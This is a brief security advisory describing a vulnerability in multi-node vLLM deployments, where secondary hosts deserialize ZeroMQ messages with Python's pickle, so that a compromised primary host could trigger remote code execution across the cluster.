In a multi-node deployment of vLLM, the secondary hosts connect to a primary vLLM host via a SUB ZeroMQ socket. Incoming data is deserialized using Python’s pickle, which is inherently unsafe and allows arbitrary code execution. If an attacker compromises the primary vLLM host, they can send malicious payloads to the connected secondary hosts, leading to remote code execution across the cluster. This vulnerability poses a significant risk in distributed environments where vLLM is used for large-scale AI inference.